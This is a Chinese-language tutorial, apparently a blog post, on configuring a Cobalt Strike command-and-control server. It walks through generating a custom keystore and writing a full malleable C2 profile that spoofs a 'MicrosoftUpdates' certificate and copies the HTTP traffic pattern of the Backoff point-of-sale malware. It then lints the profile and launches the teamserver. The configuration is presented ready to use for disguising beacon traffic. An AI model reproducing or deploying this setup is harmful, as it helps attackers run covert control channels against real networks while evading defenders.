配置超强C2-profile文件
1.生成免费的ssl证书,弃用cobaltstrike.store,用自己的mysec.store
命令生成store文件:
1
keytool -genkey -alias mysec -keyalg RSA -validity 36500 -keystore mysec.store
注意记得-alias后面的参数和-keystore后面的参数后面会用到C2-profile里面,接下来需要输入密码,一定要记得这串密码,后面会用到,不然到时候你需要自己回来重新生成下
然后输入名字,例如:US 然后一步步输入就行
最后这里输入y即可完成 然后再输入一次密码即可
ls查看当前目录就生成好了zzhsec.store文件创建修改C2-profile文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81set sample_name "zzhsec POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
设置证书
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}
设置
code-signer{
set keystore "zzhsec.store";
set password "123.zzhsec!";
set alias "zzhsec";
}
指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";
每个单独DNS请求前强制睡眠时间
set dns_sleep "0";
通过DNS上载数据时主机名的最大长度[0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
print;
}
}
server {
output {
print;
}
}
}
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
}
}
server {
header "Content-Type" "text/plain";
output {
base64;
print;
}
}
}
上面文件对标生成的zzhsec.store即可,比如
1 | Is CN=US, OU=MicrosoftUpdatess, O=MicrosoftUpdatess, L=US, ST=US, C=en |
接下来就是验证C2-profile是否可用了
命令
./c2lint me.profile
没有出现什么问题就可以了然后期待teamserver即可
命令
nohup ./teamserver 1.1.1.1 123456 ./me.profile &
然后就可以愉快的去连接了
